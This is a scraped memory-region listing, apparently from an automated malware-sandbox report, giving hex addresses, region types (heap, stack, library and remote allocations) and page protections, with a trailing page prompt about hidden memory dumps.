4A27000
|
heap
|
page read and write
|
||
|
73B000
|
heap
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
4A26000
|
heap
|
page read and write
|
||
|
8740000
|
trusted library allocation
|
page read and write
|
||
|
4B6E000
|
stack
|
page read and write
|
||
|
4E7C000
|
heap
|
page read and write
|
||
|
206DC000
|
stack
|
page read and write
|
||
|
7740000
|
heap
|
page execute and read and write
|
||
|
4A2B000
|
heap
|
page read and write
|
||
|
6EE000
|
heap
|
page read and write
|
||
|
20BB1000
|
heap
|
page read and write
|
||
|
5290000
|
trusted library allocation
|
page read and write
|
||
|
31F4000
|
heap
|
page read and write
|
||
|
4A25000
|
heap
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
4ECD000
|
heap
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
4EEE000
|
stack
|
page read and write
|
||
|
3F70000
|
remote allocation
|
page execute and read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
50DE000
|
stack
|
page read and write
|
||
|
4DA0000
|
heap
|
page read and write
|
||
|
31F4000
|
heap
|
page read and write
|
||
|
226F000
|
stack
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
7783000
|
heap
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
2F0E000
|
stack
|
page read and write
|
||
|
7BC0000
|
trusted library allocation
|
page read and write
|
||
|
2EA0000
|
heap
|
page read and write
|
||
|
B8D000
|
stack
|
page read and write
|
||
|
51E000
|
stack
|
page read and write
|
||
|
4A3E000
|
heap
|
page read and write
|
||
|
2F2A000
|
heap
|
page read and write
|
||
|
4C80000
|
direct allocation
|
page read and write
|
||
|
9DF000
|
stack
|
page read and write
|
||
|
4A26000
|
heap
|
page read and write
|
||
|
50EF000
|
stack
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
4A64000
|
heap
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
31CE000
|
stack
|
page read and write
|
||
|
83B000
|
heap
|
page read and write
|
||
|
4A16000
|
heap
|
page read and write
|
||
|
4AE0000
|
trusted library allocation
|
page read and write
|
||
|
31F0000
|
heap
|
page read and write
|
||
|
4A31000
|
heap
|
page read and write
|
||
|
73D000
|
heap
|
page read and write
|
||
|
5326000
|
trusted library allocation
|
page read and write
|
||
|
780A000
|
heap
|
page read and write
|
||
|
463000
|
unkown
|
page readonly
|
||
|
2D38000
|
stack
|
page read and write
|
||
|
72C0000
|
direct allocation
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
7B70000
|
trusted library allocation
|
page read and write
|
||
|
4ECB000
|
heap
|
page read and write
|
||
|
4A39000
|
heap
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
4D80000
|
direct allocation
|
page read and write
|
||
|
31F4000
|
heap
|
page read and write
|
||
|
4A39000
|
heap
|
page read and write
|
||
|
5290000
|
trusted library allocation
|
page read and write
|
||
|
88FC000
|
stack
|
page read and write
|
||
|
4A31000
|
heap
|
page read and write
|
||
|
3180000
|
heap
|
page read and write
|
||
|
4CE0000
|
direct allocation
|
page read and write
|
||
|
4A28000
|
heap
|
page read and write
|
||
|
2063E000
|
stack
|
page read and write
|
||
|
207DB000
|
stack
|
page read and write
|
||
|
21209000
|
unclassified section
|
page execute and read and write
|
||
|
20E38000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
4A11000
|
heap
|
page read and write
|
||
|
511E000
|
stack
|
page read and write
|
||
|
61F9000
|
trusted library allocation
|
page read and write
|
||
|
2071C000
|
stack
|
page read and write
|
||
|
4C80000
|
heap
|
page read and write
|
||
|
75EE000
|
stack
|
page read and write
|
||
|
31F4000
|
heap
|
page read and write
|
||
|
329F000
|
heap
|
page read and write
|
||
|
7A1E000
|
stack
|
page read and write
|
||
|
743000
|
heap
|
page read and write
|
||
|
8BD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4A31000
|
heap
|
page read and write
|
||
|
4A11000
|
heap
|
page read and write
|
||
|
743000
|
heap
|
page read and write
|
||
|
32BD000
|
heap
|
page read and write
|
||
|
4A1C000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
744000
|
heap
|
page read and write
|
||
|
4A64000
|
heap
|
page read and write
|
||
|
4A31000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
743000
|
heap
|
page read and write
|
||
|
9CF000
|
stack
|
page read and write
|
||
|
4A1C000
|
heap
|
page read and write
|
||
|
8BB0000
|
trusted library allocation
|
page read and write
|
||
|
4A27000
|
heap
|
page read and write
|
||
|
4A6E000
|
heap
|
page read and write
|
||
|
42C000
|
unkown
|
page read and write
|
||
|
4A5A000
|
heap
|
page read and write
|
||
|
4A11000
|
heap
|
page read and write
|
||
|
20CA2000
|
heap
|
page read and write
|
||
|
4A19000
|
heap
|
page read and write
|
||
|
7B20000
|
trusted library allocation
|
page read and write
|
||
|
20DB1000
|
heap
|
page read and write
|
||
|
4A20000
|
heap
|
page read and write
|
||
|
4E55000
|
heap
|
page read and write
|
||
|
4A35000
|
heap
|
page read and write
|
||
|
4A31000
|
heap
|
page read and write
|
||
|
6D0000
|
heap
|
page read and write
|
||
|
4C60000
|
heap
|
page read and write
|
||
|
30A0000
|
heap
|
page read and write
|
||
|
85C0000
|
trusted library allocation
|
page read and write
|
||
|
570000
|
heap
|
page read and write
|
||
|
20E29000
|
heap
|
page read and write
|
||
|
6377000
|
trusted library allocation
|
page read and write
|
||
|
2350000
|
heap
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
4A44000
|
heap
|
page read and write
|
||
|
5487000
|
heap
|
page read and write
|
||
|
3570000
|
heap
|
page read and write
|
||
|
4A3E000
|
heap
|
page read and write
|
||
|
4A1C000
|
heap
|
page read and write
|
||
|
3220000
|
trusted library allocation
|
page read and write
|
||
|
4A33000
|
heap
|
page read and write
|
||
|
4BC8000
|
trusted library allocation
|
page read and write
|
||
|
3234000
|
trusted library allocation
|
page read and write
|
||
|
4A27000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
72E000
|
heap
|
page read and write
|
||
|
51D1000
|
trusted library allocation
|
page read and write
|
||
|
4A39000
|
heap
|
page read and write
|
||
|
61D9000
|
trusted library allocation
|
page read and write
|
||
|
970000
|
heap
|
page read and write
|
||
|
2EA5000
|
heap
|
page read and write
|
||
|
2EA5000
|
heap
|
page read and write
|
||
|
4A31000
|
heap
|
page read and write
|
||
|
C40000
|
heap
|
page read and write
|
||
|
2EB0000
|
trusted library allocation
|
page read and write
|
||
|
4E6F000
|
stack
|
page read and write
|
||
|
4A2E000
|
heap
|
page read and write
|
||
|
43F000
|
unkown
|
page read and write
|
||
|
3280000
|
heap
|
page read and write
|
||
|
212B0000
|
heap
|
page read and write
|
||
|
52A0000
|
trusted library allocation
|
page read and write
|
||
|
4A3A000
|
heap
|
page read and write
|
||
|
72E0000
|
direct allocation
|
page read and write
|
||
|
8BA0000
|
trusted library allocation
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
4C20000
|
heap
|
page read and write
|
||
|
501E000
|
stack
|
page read and write
|
||
|
20A16000
|
direct allocation
|
page execute and read and write
|
||
|
8A43000
|
heap
|
page read and write
|
||
|
34B0000
|
heap
|
page read and write
|
||
|
2320000
|
heap
|
page read and write
|
||
|
2F20000
|
heap
|
page read and write
|
||
|
20B1A000
|
heap
|
page read and write
|
||
|
7871000
|
heap
|
page read and write
|
||
|
2330000
|
heap
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
8680000
|
heap
|
page read and write
|
||
|
20C2A000
|
heap
|
page read and write
|
||
|
6D8000
|
heap
|
page read and write
|
||
|
4C87000
|
heap
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
2081E000
|
stack
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
4A77000
|
heap
|
page read and write
|
||
|
20B18000
|
heap
|
page read and write
|
||
|
20EBA000
|
heap
|
page read and write
|
||
|
725D000
|
stack
|
page read and write
|
||
|
3230000
|
trusted library allocation
|
page read and write
|
||
|
2F58000
|
heap
|
page read and write
|
||
|
4C1C000
|
stack
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
4A3C000
|
heap
|
page read and write
|
||
|
8870000
|
trusted library allocation
|
page read and write
|
||
|
51EF000
|
stack
|
page read and write
|
||
|
4A3C000
|
heap
|
page read and write
|
||
|
4A39000
|
heap
|
page read and write
|
||
|
8597000
|
stack
|
page read and write
|
||
|
779C000
|
heap
|
page read and write
|
||
|
3140000
|
trusted library section
|
page read and write
|
||
|
59C2000
|
trusted library allocation
|
page read and write
|
||
|
74BA000
|
stack
|
page read and write
|
||
|
4A52000
|
heap
|
page read and write
|
||
|
2F2D000
|
heap
|
page read and write
|
||
|
4A6D000
|
heap
|
page read and write
|
||
|
4A25000
|
heap
|
page read and write
|
||
|
279F000
|
stack
|
page read and write
|
||
|
894D000
|
stack
|
page read and write
|
||
|
4ECB000
|
heap
|
page read and write
|
||
|
4A16000
|
heap
|
page read and write
|
||
|
852000
|
heap
|
page read and write
|
||
|
5261000
|
heap
|
page read and write
|
||
|
20A01000
|
direct allocation
|
page execute and read and write
|
||
|
4AFA000
|
trusted library allocation
|
page execute and read and write
|
||
|
26DE000
|
stack
|
page read and write
|
||
|
31E0000
|
heap
|
page read and write
|
||
|
33AF000
|
unkown
|
page read and write
|
||
|
4A46000
|
heap
|
page read and write
|
||
|
856000
|
heap
|
page read and write
|
||
|
6D97000
|
trusted library allocation
|
page read and write
|
||
|
4A39000
|
heap
|
page read and write
|
||
|
4A63000
|
heap
|
page read and write
|
||
|
4A10000
|
heap
|
page read and write
|
||
|
4A33000
|
heap
|
page read and write
|
||
|
85D0000
|
trusted library allocation
|
page read and write
|
||
|
550000
|
heap
|
page read and write
|
||
|
4A11000
|
heap
|
page read and write
|
||
|
2E5E000
|
stack
|
page read and write
|
||
|
B2F000
|
stack
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
20280000
|
heap
|
page read and write
|
||
|
2DFC000
|
stack
|
page read and write
|
||
|
34D0000
|
heap
|
page read and write
|
||
|
7760000
|
heap
|
page read and write
|
||
|
20600000
|
remote allocation
|
page read and write
|
||
|
9C7000
|
stack
|
page read and write
|
||
|
55A6000
|
heap
|
page read and write
|
||
|
4A76000
|
heap
|
page read and write
|
||
|
2091E000
|
stack
|
page read and write
|
||
|
6363000
|
trusted library allocation
|
page read and write
|
||
|
4C30000
|
heap
|
page read and write
|
||
|
8A01000
|
heap
|
page read and write
|
||
|
20DB0000
|
heap
|
page read and write
|
||
|
2DB0000
|
heap
|
page read and write
|
||
|
863D000
|
stack
|
page read and write
|
||
|
7B30000
|
trusted library allocation
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
4A1E000
|
heap
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
2EA5000
|
heap
|
page read and write
|
||
|
783A000
|
heap
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
4A11000
|
heap
|
page read and write
|
||
|
2089F000
|
stack
|
page read and write
|
||
|
4A21000
|
heap
|
page read and write
|
||
|
70B000
|
heap
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
2037E000
|
stack
|
page read and write
|
||
|
20A00000
|
direct allocation
|
page read and write
|
||
|
7A5E000
|
stack
|
page read and write
|
||
|
548E000
|
heap
|
page read and write
|
||
|
640000
|
heap
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
830000
|
heap
|
page read and write
|
||
|
4CE000
|
stack
|
page read and write
|
||
|
7BA0000
|
trusted library allocation
|
page read and write
|
||
|
2095D000
|
stack
|
page read and write
|
||
|
480000
|
heap
|
page read and write
|
||
|
31F4000
|
heap
|
page read and write
|
||
|
4A31000
|
heap
|
page read and write
|
||
|
4EF0000
|
heap
|
page read and write
|
||
|
7773000
|
heap
|
page read and write
|
||
|
356C000
|
heap
|
page read and write
|
||
|
4A2E000
|
heap
|
page read and write
|
||
|
4A39000
|
heap
|
page read and write
|
||
|
4A31000
|
heap
|
page read and write
|
||
|
4A10000
|
heap
|
page read and write
|
||
|
867F000
|
stack
|
page read and write
|
||
|
4A25000
|
heap
|
page read and write
|
||
|
20E41000
|
heap
|
page read and write
|
||
|
55AB000
|
heap
|
page read and write
|
||
|
5FF000
|
stack
|
page read and write
|
||
|
2128C000
|
unclassified section
|
page execute and read and write
|
||
|
4A10000
|
heap
|
page read and write
|
||
|
7AF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
745000
|
heap
|
page read and write
|
||
|
3040000
|
heap
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
8990000
|
trusted library allocation
|
page execute and read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
4D50000
|
direct allocation
|
page read and write
|
||
|
4EBD000
|
heap
|
page read and write
|
||
|
8690000
|
heap
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
4A46000
|
heap
|
page read and write
|
||
|
85A0000
|
heap
|
page read and write
|
||
|
71F000
|
heap
|
page read and write
|
||
|
4A39000
|
heap
|
page read and write
|
||
|
73B000
|
heap
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
211B0000
|
unclassified section
|
page execute and read and write
|
||
|
2CD000
|
stack
|
page read and write
|
||
|
310F000
|
stack
|
page read and write
|
||
|
556000
|
heap
|
page read and write
|
||
|
4A31000
|
heap
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
51C0000
|
heap
|
page read and write
|
||
|
4A75000
|
heap
|
page read and write
|
||
|
7AE0000
|
trusted library allocation
|
page read and write
|
||
|
2F2A000
|
heap
|
page read and write
|
||
|
4C60000
|
trusted library allocation
|
page execute and read and write
|
||
|
4A8B000
|
heap
|
page read and write
|
There are 710 hidden memdumps, click here to show them.